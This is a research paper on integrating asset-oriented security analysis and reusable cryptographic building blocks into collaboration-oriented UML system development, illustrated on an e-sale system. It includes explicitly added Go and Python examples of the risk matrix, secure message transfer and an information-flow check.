The creation of secure systems needs the combined effort of domain experts having in-depth knowledge of the application domain of a system and of security experts [7]. A straightforward way is that the domain expert first develops a functionally correct, yet unprotected system. Thereafter, the security expert analyzes the system for vulnerabilities, threats and risks, and adds countermeasures hardening it against malicious attacks. This kind of security analysis has been well known since the seventies [8]. More recently, model-based techniques for secure system development were introduced as well [9,10,11,12,13,14]. We also propose a technique based on UML [7,15,16], following the security analysis standard ISO/IEC Common Criteria [6]. The integration of the security analysis into the SPACE engineering methodology leads to the procedure depicted in Fig. 3. There the domain expert is represented by the simple person icon while the security expert is represented by a person icon carrying a lock. First, the domain expert creates a functional system model by composing and analyzing a set of UML collaborations, activities and ESMs, as presented in Sect. 2. When the system is functionally correct, it is handed over to the security expert who enhances the system by performing a security analysis which consists of the following series of steps:
Step 1. Valuation of assets and definition of security objectives.
Step 2. Identification of weaknesses and threats.
Step 3. Assessment of the resulting risks.
Step 4. Planning, design and evaluation of suitable countermeasures.
Step 4 results in an extended system specification which of course may contain new vulnerabilities. Therefore, the analysis has to be reiterated with the extended system model at step 2, which may lead to further countermeasures protecting the original ones. The iteration is stopped in step 3 when all risks for the system are considered bearable. The accomplishment of steps 2 and 3 can be supported by various tools based on graph transformation [15,16] as well as model checkers such as Scyther [17] and Casper/FDR [18]. The use of these tools, however, is not within the focus of this paper. The integration of countermeasures in step 4 is supported by a library of security building blocks. The library contains basic security primitives which can be used by the security expert to develop suitable countermeasures. Frequently used countermeasures are also stored in the library. Examples of security building blocks for basic security primitives and countermeasures are introduced later in Sect. 5. Thus, the security expert adds a countermeasure by utilizing the corresponding blocks of the library and composing them with the blocks modeling the system functionality. Sometimes the integration of a security mechanism changes the functionality of the system (see [7]). In that case, the domain expert has to repeat the functional analysis for the extended system to check whether the changes can be accepted. When the security expert decides that the risks of the resulting system are bearable, the system specification is transformed into a component-oriented model from which executable code is generated. For the remainder we assume that these two subsequent transformation steps do not add any further vulnerabilities.
[Figure 3 is not reproduced in this text version. It shows the domain expert's Functional Design & Analysis, drawing on domain-specific libraries, producing the system specification; the security expert's Security Analysis cycling through Asset Valuation, Weakness & Threat Identification, Risk Assessment and, while the risk is NOT bearable, Countermeasure Design & Integration drawing on the Security Library; and, once the risk is bearable, the security-aware system specification passing through Model Transformation and Code Generation to executable code.]
Fig. 3. Security-enhanced development method
4 Security Analysis of the e-Sale System
The e-sale system is implemented as two distributed components. The component for the merchant runs on a server and the customer component is deployed on a mobile device or a personal computer. Therefore, there are three parts that make up the e-sale system: the merchant application, the customer application and a communication channel between them, which we assume to be public. In the following, we focus on confidentiality and integrity issues in communication security. We assume that sufficiently strong authentication and access control (e.g., based on LDAP directories and X.509 certificates) is enforced on the devices running the system components, such that direct attacks on the hosts are unlikely. Concerning availability, we assume an intrusion detection system (IDS) is in place that guards the system against denial-of-service attacks. In step 1 of the security analysis, the security expert identifies that the information exchanged between the components is an important asset. In UML activities, a message transmission is represented as an activity flow crossing a partition border. These flows are hidden in the Order and Payment services, such that the expert has to examine their details in addition to the system in Fig. 2.
[Figure 4 is not reproduced in this text version. It shows the Order activity with the partitions buyer (pins start, products: List, buy: List) and seller (pin finish: Order); the seller's operation get catalogue and its operation create order; the catalogue (a List) and the order (an Order) cross the partition border.]
Fig. 4. UML activity for the Order service
From the UML activity for the Order service, depicted in Fig. 4, three types of information can be distinguished: a simple call message for the catalogue of products, the catalogue itself, and the order data including information about the items to be purchased and the delivery address. In the Payment service (not shown in detail here), there are two types of messages: invoice data and payment information, which includes the credit card number, cardholder name, expiry date and card security code. In order to estimate the value of an asset, we attach properties related to the basic security objectives confidentiality and integrity to the asset. The magnitude of these properties describes the financial value of the asset and, correspondingly, the degree of protection needed. Since it is often difficult to estimate the true financial value of an asset, we use instead seven security levels which correspond to the evaluation assurance levels defined in the Common Criteria [6]. Level 1 should be assigned to the confidentiality property of information if the damage caused by revealing the information is only minor, while level 7 should be used if eavesdropping leads to highly serious consequences, particularly for the owner of the information. The security expert assigns level 1 to the confidentiality property of the catalogue of products in the e-sale example since it is intended to be publicly available so that everybody can read it easily. The same level also applies to the integrity property. In contrast, the order information has level 5 both for its confidentiality and integrity properties since revealing it to other entities leads to privacy issues and modifying the information also causes serious consequences for both the customer and the merchant. The same holds for the invoice information, while the payment information is rated with level 7 due to the severe consequences of eavesdropping on the credit card information.
In step 2 of the security analysis, weaknesses and threats of the system are identified by considering possible attacks. Since the communication channel is public, malicious entities can eavesdrop, alter and replay messages in the channel. All information exchanged is vulnerable since no protection has been applied yet. Thus, those attacks are all substantial threats. Based on the valuation of an asset and the seriousness of an attack on it, risk is calculated in step 3 of the security analysis. The matrix in Tab. 1 [7,15] is used to calculate the risk level.

Table 1. Matrix for calculating risk values (rows: asset level, columns: threat level)

Asset level | Threat level:  1  2  3  4  5  6  7
     1      |                0  0  1  1  2  3  3
     2      |                0  1  1  2  3  3  4
     3      |                1  1  2  3  3  4  5
     4      |                1  2  3  3  4  5  5
     5      |                2  3  3  4  5  5  6
     6      |                3  3  4  5  5  6  7
     7      |                3  4  5  5  6  7  7

It reflects that risks in general depend on both the value of an asset and on the seriousness of the vulnerabilities and threats [19]. The risk level 0 means that no risk is assumed. For our e-sale example, since the confidentiality and integrity value of the catalogue of products is 1 and the threat seriousness level is 7, the risk level of this information is 3. For the order information, the result is 6 both for the confidentiality and integrity risks. Using a policy in which level 3 is considered bearable, this risk assessment shows that the risk of transmitting the catalogue can be accepted. However, the risks for the other three assets are too high. Therefore, we proceed to step 4 in which the security expert designs suitable countermeasures to mitigate the threats and integrates them into the system.
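The valuation, threat rating and matrix lookup above, together with the iteration of steps 2 to 4 described in Sect. 3, can be written down as a small executable procedure. The following Go program is an added example for this edition; it is not part of the paper or of the SPACE tool. It encodes Table 1 as given, the e-sale valuations of this section (the integrity level of the payment information, which the text does not state, is assumed to be 7 like its confidentiality level), and the single countermeasure of Sect. 5, which the paper rates as lowering the remaining threat level to 1. The names Asset, Risk, Unbearable, Analyse and ESaleAssets are ours.

```go
package main

import "fmt"

// riskMatrix reproduces Table 1: riskMatrix[asset-1][threat-1] for levels 1..7.
var riskMatrix = [7][7]int{
	{0, 0, 1, 1, 2, 3, 3},
	{0, 1, 1, 2, 3, 3, 4},
	{1, 1, 2, 3, 3, 4, 5},
	{1, 2, 3, 3, 4, 5, 5},
	{2, 3, 3, 4, 5, 5, 6},
	{3, 3, 4, 5, 5, 6, 7},
	{3, 4, 5, 5, 6, 7, 7},
}

// Asset is one piece of transmitted information: its valuation from step 1
// (one level per security property) and the threat level found for each
// property in step 2 (7 for eavesdropping, alteration and replay on a public channel).
type Asset struct {
	Name       string
	ConfLevel  int // value of the confidentiality property, 1..7
	IntLevel   int // value of the integrity property, 1..7
	ConfThreat int // seriousness of the threats to confidentiality, 1..7
	IntThreat  int // seriousness of the threats to integrity, 1..7
	Protected  bool
}

// Risk is step 3 for a single property. Levels outside 1..7 are modelling errors.
func Risk(assetLevel, threatLevel int) int {
	if assetLevel < 1 || assetLevel > 7 || threatLevel < 1 || threatLevel > 7 {
		panic(fmt.Sprintf("level out of range: asset %d, threat %d", assetLevel, threatLevel))
	}
	return riskMatrix[assetLevel-1][threatLevel-1]
}

// MaxRisk is the higher of the confidentiality and the integrity risk of an asset.
func (a Asset) MaxRisk() int {
	c, i := Risk(a.ConfLevel, a.ConfThreat), Risk(a.IntLevel, a.IntThreat)
	if i > c {
		return i
	}
	return c
}

// Unbearable lists, in input order, the assets whose risk exceeds the policy threshold.
func Unbearable(assets []Asset, bearable int) []string {
	var names []string
	for _, a := range assets {
		if a.MaxRisk() > bearable {
			names = append(names, a.Name)
		}
	}
	return names
}

// secureTransfer is the only countermeasure of this example: composing a Secure
// Message Transfer block with the service, after which the paper rates the
// remaining threat level for both properties as 1.
func secureTransfer(a Asset) Asset {
	a.ConfThreat, a.IntThreat, a.Protected = 1, 1, true
	return a
}

// Analyse iterates steps 2 to 4 of the security analysis: protect every asset
// whose risk is not bearable and re-assess. It stops when all risks are bearable
// or when no countermeasure is left to apply, and reports the assets still at
// risk so that the loop terminates instead of running forever under a strict policy.
func Analyse(assets []Asset, bearable int) (applied, unresolved []string) {
	assets = append([]Asset(nil), assets...) // work on a copy
	for {
		progress := false
		for i := range assets {
			if assets[i].MaxRisk() > bearable && !assets[i].Protected {
				assets[i] = secureTransfer(assets[i])
				applied = append(applied, assets[i].Name)
				progress = true
			}
		}
		if !progress {
			return applied, Unbearable(assets, bearable)
		}
	}
}

// ESaleAssets are the valuations of Sect. 4 for the unprotected public channel.
// Assumption: the integrity level of the payment information, which the text
// does not state, is taken as 7 like its confidentiality level.
func ESaleAssets() []Asset {
	return []Asset{
		{Name: "catalogue", ConfLevel: 1, IntLevel: 1, ConfThreat: 7, IntThreat: 7},
		{Name: "order", ConfLevel: 5, IntLevel: 5, ConfThreat: 7, IntThreat: 7},
		{Name: "invoice", ConfLevel: 5, IntLevel: 5, ConfThreat: 7, IntThreat: 7},
		{Name: "payment", ConfLevel: 7, IntLevel: 7, ConfThreat: 7, IntThreat: 7},
	}
}

func main() {
	applied, unresolved := Analyse(ESaleAssets(), 3)
	fmt.Println("protected:", applied, "still at risk:", unresolved)
}
```

With the policy of the paper (level 3 bearable) the first pass leaves the catalogue alone and protects order, invoice and payment, and the second pass finds nothing left to do. Under a stricter policy (level 2) the payment information, at risk level 3 even after the countermeasure, is returned as unresolved rather than looping; that explicit exit is the check the iteration in Fig. 3 needs when the countermeasure catalogue cannot lower a risk any further.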
5 Security Specific Building Blocks
Several cryptographic techniques are typically used to protect messages in transit: encryption can be employed to achieve confidentiality, a digital signature can be used to detect message modifications, and adding nonces to messages thwarts replay attacks, provided the receiver remembers which nonces it has already accepted. One can use a combination of these three basic cryptographic primitives to protect the order, invoice and payment messages in the e-sale system. Thus, instead of sending a message msg in the clear, the message is encoded in the form {n|msg|{hash(n|msg)}KRs}KUr, where | represents concatenation of data, n is a nonce, i.e., a random value used only once, hash() is a one-way hash function, {}KRs represents an encryption with the private key of the sender (the signature) and {}KUr is an encryption with the public key of the receiver. The rest of this section will show how this solution is represented by SPACE building blocks. A basic security primitive consists of security operations that must be executed by a sender and a receiver to fulfill one or more security objectives. For example, to achieve message integrity, one can use a digital signature that consists of two operations: one for signing the message and the other for verifying the signature. These two operations are performed by the sender and the receiver, respectively. We encapsulate this pair of operations in a single building block and put it in a library of basic security primitives in order to help the security expert to create more complex security mechanisms.
[Figure 5 is not reproduced in this text version. Left: the Digital Signature block with the partitions sender (pins plainIn: byte[], sigOut: byte[]; operation sign) and receiver (pins sigIn: byte[], plainOut: byte[], sigError; operation verify: boolean with branches [true]/[false], variable msg: byte[], operation get msg). Right: the Secure Message Transfer block with the partitions sender (pin msgIn: byte[]) and receiver (pins msgOut: byte[], securityAttack), composed from n: Handle Nonce (pins plainIn, noncedOut, noncedIn, plainOut, nonceError), d: Digital Signature (pins plainIn, sigOut, sigIn, plainOut, sigError) and e: Public Key Encryption (pins plainIn, cipherOut, cipherIn, plainOut).]
Fig. 5. Building Block for Digital Signature and Secure Message Transfer
The building block for the security primitive digital signature is shown in the left part of Fig. 5. This block starts by receiving a token containing a message m to be signed via pin plainIn. Then, a call to an operation sign implementing the signing function is performed and a token is emitted via pin sigOut with data of the form m|{hash(m)}KRs. Some time later, the receiver receives the signed data via pin sigIn and verifies the signature {hash(m)}KRs in the operation verify. Further, it stores the original message m in the variable msg and outputs a Boolean value indicating whether the integrity of the message is preserved. Depending on the result, either the original message is given out via pin plainOut or a token is emitted via pin sigError. Note that the Digital Signature block does not itself specify any direct communication between its participants, but rather encapsulates the corresponding operations. The operations sign and verify in the Digital Signature block contain Java code for a digital signature implementation with a particular algorithm. We utilize a set of APIs from the Java Cryptography Architecture (JCA) [20] and the Java Cryptography Extension (JCE) [21] for the implementation of cryptographic algorithms and other related material such as encryption keys and public key certificates. It is of course possible to adapt the building block to use other secure implementations of cryptographic algorithms or keys. Building blocks for Public Key Encryption and Handle Nonce are also created. They are not shown here in detail, since those blocks are similar to the Digital Signature block. The security expert then composes instances of these three blocks in order to create the block of the security mechanism Secure Message Transfer, depicted in the right part of Fig. 5.
A message transferred from the sender to the receiver in this block is protected such that the transmitted message is unintelligible to entities other than the sender and the receiver as long as the private key of the receiver is not compromised. This block also guarantees that every message emitted via pin msgOut is identical to the corresponding message received via msgIn as long as the private key of the sender is not compromised. Furthermore, if a malicious entity attempts to replay a message or to modify it, the receiver is notified via pin securityAttack. Since this security mechanism can be used to secure other systems as well, the block is put in the library of security building blocks for further use. Moreover, the security expert may also use this block to create more complex and specific security mechanisms.
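The encoding {n|msg|{hash(n|msg)}KRs}KUr introduced at the start of this section and the behaviour of the Secure Message Transfer block just described (a message is delivered only if decryption, signature check and nonce check all succeed; otherwise a token goes to securityAttack) can be exercised end to end. The Go program below is an added example for this edition, not code from the paper, whose blocks are implemented in Java with JCA/JCE. It uses only the Go standard library: RSA-PSS for the signature, a 16-byte random nonce and, as an assumption of ours, hybrid encryption (AES-256-GCM under a key wrapped with RSA-OAEP) for the outer {...}KUr, because a single RSA block cannot carry a message together with a signature. Receiver, Protect, Unprotect and Demo are our names, and the order message is a constructed sample.

```go
package main

import (
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
)

const nonceLen, ivLen = 16, 12 // length of the nonce n; standard GCM nonce size
var ErrSecurityAttack = errors.New("securityAttack") // token on the securityAttack pin

// must panics on local failures (key generation, RNG, own-key operations), which are set-up faults no peer can trigger.
func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

func randBytes(n int) []byte {
	b := make([]byte, n)
	must(rand.Read(b))
	return b
}

// Receiver: own private key, the sender's public key and the nonces already accepted.
type Receiver struct {
	priv      *rsa.PrivateKey
	senderPub *rsa.PublicKey
	seen      map[[nonceLen]byte]bool // state of the Handle Nonce block
}

// Protect is the sender side of {n|msg|{hash(n|msg)}KRs}KUr. Assumption: the outer encryption
// is hybrid (AES-256-GCM under an RSA-OAEP-wrapped key); one RSA block cannot hold msg plus a signature.
func Protect(senderPriv *rsa.PrivateKey, receiverPub *rsa.PublicKey, msg []byte) []byte {
	payload := append(randBytes(nonceLen), msg...) // n|msg
	digest := sha256.Sum256(payload)
	sig := must(rsa.SignPSS(rand.Reader, senderPriv, crypto.SHA256, digest[:], nil))
	key := randBytes(32)
	wrapped := must(rsa.EncryptOAEP(sha256.New(), rand.Reader, receiverPub, key, nil))
	gcm := must(cipher.NewGCM(must(aes.NewCipher(key))))
	iv := randBytes(ivLen)
	// wire format: wrapped key (receiverPub.Size() bytes) | iv | GCM(n|msg|sig)
	return append(append(wrapped, iv...), gcm.Seal(nil, iv, append(payload, sig...), nil)...)
}

// Unprotect is the receiver side: undecryptable, modified, wrongly signed or replayed input yields ErrSecurityAttack, never a message.
func (r *Receiver) Unprotect(wire []byte) ([]byte, error) {
	ks, sigLen := r.priv.Size(), r.senderPub.Size()
	if len(wire) < ks+ivLen {
		return nil, ErrSecurityAttack
	}
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, r.priv, wire[:ks], nil)
	if err != nil || len(key) != 32 { // a peer-supplied key of another size must not panic below
		return nil, ErrSecurityAttack
	}
	gcm := must(cipher.NewGCM(must(aes.NewCipher(key))))
	plain, err := gcm.Open(nil, wire[ks:ks+ivLen], wire[ks+ivLen:], nil)
	if err != nil || len(plain) < nonceLen+sigLen {
		return nil, ErrSecurityAttack // modified in transit or malformed
	}
	payload, sig := plain[:len(plain)-sigLen], plain[len(plain)-sigLen:]
	digest := sha256.Sum256(payload)
	if rsa.VerifyPSS(r.senderPub, crypto.SHA256, digest[:], sig, nil) != nil {
		return nil, ErrSecurityAttack // not signed with the expected sender's KRs
	}
	var n [nonceLen]byte
	copy(n[:], payload[:nonceLen])
	if r.seen[n] {
		return nil, ErrSecurityAttack // nonce already accepted: replay
	}
	r.seen[n] = true
	return payload[nonceLen:], nil
}

// Demo sends a constructed order from customer to merchant over a channel the attacker controls,
// then replays, modifies and forges it; the map records what the merchant side observed.
func Demo() map[string]bool {
	genKey := func() *rsa.PrivateKey { return must(rsa.GenerateKey(rand.Reader, 2048)) }
	customer, merchant, intruder := genKey(), genKey(), genKey()
	recv := &Receiver{priv: merchant, senderPub: &customer.PublicKey, seen: map[[nonceLen]byte]bool{}}
	order := []byte(`{"items":["sku-42"],"deliver_to":"Trondheim"}`) // constructed sample
	attack := func(w []byte) bool { _, err := recv.Unprotect(w); return errors.Is(err, ErrSecurityAttack) }
	wire := Protect(customer, &merchant.PublicKey, order)
	got, err := recv.Unprotect(wire)
	tampered := append([]byte{}, wire...)
	tampered[len(tampered)-1] ^= 1 // flip one bit of the ciphertext (here: of the GCM tag)
	return map[string]bool{
		"delivered":        err == nil && string(got) == string(order),
		"replay_detected":  attack(wire), // the same ciphertext a second time
		"tamper_detected":  attack(tampered),
		"forgery_detected": attack(Protect(intruder, &merchant.PublicKey, order)), // KUr is public, KRs is not
	}
}
```

Two points the block description leaves implicit become visible in the code. Replay detection is stateful: the receiver has to remember the nonces it has accepted (here an unbounded set, which a deployment would bound with a validity window or sequence numbers). And the authenticated encryption alone does not identify the sender, since anyone holding the receiver's public key can produce a well-formed ciphertext; only the signature check under the expected sender's public key rejects the forged order.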
6 Secure e-Sale System
The secure message transfer mechanism is used to protect the exchanged messages containing the order, invoice and payment information in the e-sale system. Therefore, instances of the Secure Message Transfer block are composed with the Order and Payment services in order to produce a security-aware system specification. The Secure Order service, depicted in the upper right of Fig. 6, is the result of composing the security block with the Order service. Similarly, the Payment service is also extended, resulting in the Secure Payment service. Note that the Secure Message Transfer block indicates a security breach by emitting a token via pin securityAttack instead of giving out the transferred message. This has to be taken care of to keep the Secure Order and Secure Payment services consistent. For the Secure Order service, an alternative output pin securityAttack is added. This change alters the functional behavior of the e-sale system. The operation handle attack, which logs the attacks for further analysis, and the operation confirm failed, in which a notification of transaction failure is sent to the customer, are executed in the event of a security breach, as shown in the left part of Fig. 6. These enhancements are examined by the domain expert and the functional analysis is performed once more to ensure that the secure e-sale system is functionally correct. Another round of the security analysis needs to be performed. A reiterated step 2 of the security analysis on the secure e-sale system shows that the same threats are still applicable: malicious entities may still harm the system by eavesdropping, modifying and replaying messages transferred in the communication channel. However, since the security expert employs the secure message transfer to protect the order, invoice and payment information, the threat level is reduced to 1. In consequence, the risk level of that information is now 3 or less and thus bearable.
Up to this point, both the domain and security experts are convinced that the secure e-sale system is functionally correct and adequately protected with respect to the risk assessment.¹ As described previously, the subsequent implementation of the secure e-sale system is performed in two automated steps. First, it is transformed into a component-oriented model, expressed in executable state machines. Afterwards, platform-dependent executable code is generated from the state machines (see [3]). Then, the code, including some security settings (e.g., digital certificates), can be deployed.
¹ The unprotected transmission of the success respectively failed information is also a vulnerability since an intruder can alter it. We do not discuss that here for brevity.
[Figure 6 is not reproduced in this text version. Left: the «system» Secure e-Sale activity with the partitions customer and merchant, the call behavior actions so: Secure Order and sp: Secure Payment with their new securityAttack pins, the operation handle attack feeding confirm failed, and the unchanged operations select products, get sCart, create invoice, display invoice and confirm, display "success" and display "failed". Upper right: the Secure Order activity with the partitions buyer and seller, in which t: Secure Message Transfer (pins msgIn, msgOut, securityAttack) carries the output of create order to the finish: Order pin, with the alternative output pin securityAttack.]
Fig. 6. The secure e-Sale system
Collaboration-oriented modeling in our approach facilitates the reuse of security solutions. From our development method, we can classify a security-aware system model into building blocks for security primitives and mechanisms obtained from the security library and thus intended to be reused, application-related blocks, and some adaptations needed as the result of the security analysis. In order to estimate the degree of reuse related to security aspects we compute the ratio of the first category to the combination of the last two. Since our development activities consist of creating UML models and writing Java code in the call operation actions as well as other related code (e.g., class Order in the Secure Order block), we can estimate the reuse rate in terms of these two factors. For our secure e-sale system, we use three instances of the security-specific block Secure Message Transfer. This block contains the Digital Signature, the Public Key Encryption and the Handle Nonce blocks. The building blocks in the e-Sale system depicted in Fig. 2 are the application-related blocks, while some call operation actions, such as handle attack, and pins (e.g., securityAttack) constitute the adaptations. By calculating the number of UML elements and the number of lines of Java code in the system, we find that 68% of the elements and 32% of the code are reusable security solutions.
Naturally, the degree of reuse depends on many factors. The complexity of security mechanisms is one of them. Moreover, different applications will also result in different reuse proportions. Overall, the reuse of security aspects and also the reuse proportion from functional models (see [5]) contribute to reducing the time and effort in developing security-aware systems.
7 Related Work
Although many experts agree on the importance of integrating security aspects early in the development of a secure system, in practice security is still treated as an add-on since currently there is no straightforward methodology and tool support to achieve this [22,23]. Nevertheless, several approaches towards this goal have been proposed. SecureUML [24,25] is an extension of UML to specify role-based access control policies. A model transformation can be applied to an extended UML diagram to generate system code that includes security infrastructure. Our work differs in that SecureUML is specific to access control. UMLsec [26] is an extension of UML that models security requirements, such as secrecy, secure information flow, secure communication links, etc., as stereotypes, tagged values and constraints. This UML profile can be attached to model elements of UML diagrams. It provides a means to evaluate a UML specification for security. Our approach differs in that UMLsec does not facilitate the reuse of a secure system specification. Moreover, it does not specify the automatic generation of code from design models. In aspect-oriented modeling, security mechanisms are described by aspects and are woven into base specifications at join points. Mouheb et al. propose a mechanism to weave security aspects into UML 2.0 models at the design phase [27]. Georg et al. propose using aspect-oriented technology in combination with misuse models in order to perform security analysis [28]. Pavlich-Mariscal et al. propose an approach to extend UML with security diagrams that represent access control policies as aspects [29]. Our work differs in that the aspect-oriented method does not consider the changes of the functional behavior of the systems after security aspects are woven into base specifications. In addition, the CORAS method [30], which contains seven steps of security analysis, was proposed.
Recently, Refsdal and Stølen suggested an approach that extends a security analysis to include the measurement of related key indicators to determine the likelihood and consequences of unwanted incidents [14]. Unlike those works, our approach also covers the integration of the security analysis into system design and implementation.
8 Concluding Remarks and Future Work
We propose an approach for integrating security aspects into system development using collaboration-oriented models. The approach extends the SPACE engineering method by including the asset-oriented security analysis. In particular, we demonstrate how security analysis is performed on a collaboration-oriented system specification and how security mechanisms are designed as collaboration models and integrated with the system specification. Our initial experience shows that the collaboration models of security solutions as presented in Sect. 5 are useful for developing security-aware systems efficiently. The building blocks hide the complexity of the security mechanisms, facilitating their integration into the system specifications. Moreover, the security library facilitates the reuse of countermeasures and the design of more advanced security solutions. The approach presented in this paper is not only well suited for the separation of work between domain-specific experts and security experts, but also provides a mechanism to integrate the work of these two types of experts. Another benefit of this approach is that it allows security solutions to be integrated early in the development of secure systems. In the future, our approach will be extended in various ways. Of course, we will expand our libraries with building blocks for more complex security mechanisms like authentication, access control, and intrusion detection. Further, it is worthwhile to support carrying out the security analysis steps (see Sect. 3) with meaningful tools. The formal semantics of the SPACE method, based on temporal logic, makes it suitable for model checking. We already integrated a model checker for functional properties into SPACE (see [4]). Likewise, one can attach security-related checkers such as Scyther [17] that inspect the UML models for the existence of vulnerabilities. In addition, the graphical nature of the model descriptions in the form of UML collaborations and activities leads to the utilization of graph rewriting techniques.
For example, in [15] we presented the use of graph rewriting for information flow analysis based on the decentralized label model of Myers [31]. There, both information and components carry static or dynamic labels (see [32]). Special operators check whether information may reach components that provide access to principals not allowed to read it. This analysis can be added to our proposed method by attaching the labels to the components and to the edges over which the information is passed. The integration of security mechanisms can also be supported by graph rewriting. For instance, adding the building block Secure Message Transfer as a call behavior action can be realized by a quite simple graph rewriting rule which, e.g., transforms the model in Fig. 4 automatically into the Secure Order service in Fig. 6. These and further analysis extensions may help to reduce the cost of risk analysis and of integrating suitable security mechanisms into distributed systems. Lower costs may lead to broader use of security analysis and, in consequence, help to raise the security quality of software in general.
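The label check sketched above, as an added example and not the authors' graph-rewriting implementation of [15]: a decentralized label records, per owner, which principals that owner lets read the information, and information may flow onto a channel or into a component only if the target's label is at least as restrictive. The components, principals and labels are constructed for the illustration, and the "secure message transfer" case models the building block of Sect. 5 simply as an edge whose label preserves the owner's policy, which is an assumption of this example.

```python
"""Static information-flow check with decentralized labels over a component
graph, in the spirit of Myers's decentralized label model. Added illustration;
the components, principals and labels are constructed, not taken from the paper."""
from typing import Dict, List, Set, Tuple

# A label maps each owner of the information to the principals that owner
# allows to read it. An owner may always read its own data.
Label = Dict[str, Set[str]]
Edge = Tuple[str, str, Label]   # (source component, target component, channel label)


def effective_readers(label: Label, principals: Set[str]) -> Set[str]:
    """Principals allowed to read by every owner's policy (no owner: everyone)."""
    return {p for p in principals
            if all(p == owner or p in allowed for owner, allowed in label.items())}


def flows_to(src: Label, dst: Label) -> bool:
    """src may flow to dst iff dst is at least as restrictive: every owner of src
    still owns dst, and dst grants that owner's data to no additional readers."""
    return all(owner in dst and dst[owner] <= src[owner] for owner in src)


def check_flows(components: Dict[str, Label], edges: List[Edge]) -> List[str]:
    """Walk every edge and report where labelled information would reach a
    channel or a component that exposes it to principals its owner excluded."""
    findings = []
    for src, dst, channel in edges:
        if not flows_to(components[src], channel):
            findings.append(f"{src} -> {dst}: channel too permissive")
        if not flows_to(channel, components[dst]):
            findings.append(f"{src} -> {dst}: component {dst} too permissive")
    return findings


# Constructed order-service graph: customer data is owned by "customer",
# who lets only "shop" read it.
CUSTOMER: Label = {"customer": {"shop"}}
PUBLIC: Label = {}                       # no owner: anyone may read
COMPONENTS: Dict[str, Label] = {
    "Client": CUSTOMER,
    "Shop": CUSTOMER,
    "Marketing": {"customer": {"shop", "marketing"}},   # grants an extra reader
}

# Plain message transfer: the network edge carries no policy, so it is public.
PLAIN: List[Edge] = [("Client", "Shop", PUBLIC)]
# Secure message transfer (assumed here to be a confidential channel): the
# edge keeps the customer's policy, so the flow is accepted.
SECURE: List[Edge] = [("Client", "Shop", CUSTOMER)]
# Forwarding from Shop to Marketing is flagged whatever the channel does.
LEAKY: List[Edge] = [("Client", "Shop", CUSTOMER), ("Shop", "Marketing", CUSTOMER)]
```

`check_flows(COMPONENTS, PLAIN)` flags the unprotected edge, `check_flows(COMPONENTS, SECURE)` returns no findings, and `check_flows(COMPONENTS, LEAKY)` flags the Marketing component even though every edge is protected, which is the distinction between securing the transport and securing where the information is allowed to end up.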
84
L.A. Gunawan, P. Herrmann, and F.A. Kraemer
References
1. Anderson, R.J.: Security Engineering: A Guide to Building Dependable Distributed Systems. John Wiley & Sons, Inc., New York (2008)
2. Herrmann, P., Kraemer, F.A.: Design of Trusted Systems with Reusable Collaboration Models. In: Etalle, S., Marsh, S. (eds.) IFIPTM 2007. IFIP, vol. 238, pp. 317–332. Springer, Heidelberg (2007)
3. Kraemer, F.A.: Engineering Reactive Systems: A Compositional and Model-Driven Method Based on Collaborative Building Blocks. PhD thesis, Norwegian University of Science and Technology (August 2008)
4. Kraemer, F.A., Slåtten, V., Herrmann, P.: Tool Support for the Rapid Composition, Analysis and Implementation of Reactive Services. Journal of Systems and Software (2009)
5. Kraemer, F.A., Herrmann, P.: Automated Encapsulation of UML Activities for Incremental Development and Verification. In: Schürr, A., Selic, B. (eds.) MODELS 2009. LNCS, vol. 5795. Springer, Heidelberg (2009)
6. ISO/IEC: Common Criteria for Information Technology Security Evaluation, International Standard ISO/IEC 15408 (1998)
7. Herrmann, P., Herrmann, G.: Security-Oriented Refinement of Business Processes. Electronic Commerce Research Journal 6(3-4), 305–335 (2006)
8. Baskerville, R.: Information Systems Security Design Methods: Implications for Information Systems Development. ACM Computing Surveys 25(4), 375–414 (1993)
9. Baskerville, R.: Designing Information Systems Security. Wiley & Sons, Chichester (1988)
10. CCTA: SSADM-CRAMM Subject Guide for SSADM Version 3 and CRAMM Version 2. CCTA, London (1991)
11. Kienzle, D.M., Wulf, W.A.: A Practical Approach to Security Assessment. In: Proceedings of the Workshop New Security Paradigms 1997, Lake District (1997)
12. Leiwo, J., Gamage, C., Zheng, Y.: Harmonizer — A Tool for Processing Information Security Requirements in Organization. In: Proceedings of the 3rd Nordic Workshop on Secure Computer Systems (NORDSEC 1998), Trondheim (1998)
13. Lund, M.S., den Braber, F., Stølen, K.: Maintaining Results from Security Assessments. In: Proceedings of the 7th European Conference on Software Maintenance and Reengineering (CSMR 2003), pp. 341–350. IEEE Computer Society Press, Los Alamitos (2003)
14. Refsdal, A., Stølen, K.: Employing key indicators to provide a dynamic risk picture with a notion of confidence. In: Trust Management III, Boston. Springer, Heidelberg (2009)
15. Herrmann, P.: Information Flow Analysis of Component-Structured Applications. In: Proceedings of the 17th Annual Computer Security Applications Conference (ACSAC 2001), New Orleans, pp. 45–54. IEEE Computer Society Press, Los Alamitos (2001)
16. Herrmann, P., Krumm, H.: Object-oriented security analysis and modeling. In: Proceedings of the 9th International Conference on Telecommunication Systems — Modelling and Analysis, Dallas, ATSMA, IFIP, March 2001, pp. 21–32 (2001)
17. http://people.inf.ethz.ch/cremersc/scyther/
18. http://web.comlab.ox.ac.uk/people/gavin.lowe/Security/Casper/
19. Courtney, R.: Security Risk Assessment in Electronic Data Processing. In: AFIPS Conference Proceedings of the National Computer Conference, vol. 46, Arlington, pp. 97–104 (1977)
Towards the Integration of Security Aspects into System Development
85
20. http://java.sun.com/javase/6/docs/technotes/guides/security/crypto/CryptoSpec.html
21. http://java.sun.com/j2se/1.5.0/docs/guide/security/jce/JCERefGuide.html
22. Siponen, M., Heikka, J.: Do secure information system design methods provide adequate modeling support? Information and Software Technology 50(9-10) (2008)
23. Vaughn Jr., R.B., Henning, R., Fox, K.: An empirical study of industrial security-engineering practices. Journal of Systems and Software 61(3), 225–232 (2002)
24. Basin, D., Doser, J., Lodderstedt, T.: Model driven security: From UML models to access control infrastructures. ACM Transactions on Software Engineering and Methodology 15(1), 39–91 (2006)
25. Lodderstedt, T., Basin, D.A., Doser, J.: SecureUML: A UML-based modeling language for model-driven security. In: Jézéquel, J.-M., Hussmann, H., Cook, S. (eds.) UML 2002. LNCS, vol. 2460, pp. 426–441. Springer, Heidelberg (2002)
26. Jürjens, J.: Secure System Development with UML. Springer, Heidelberg (2004)
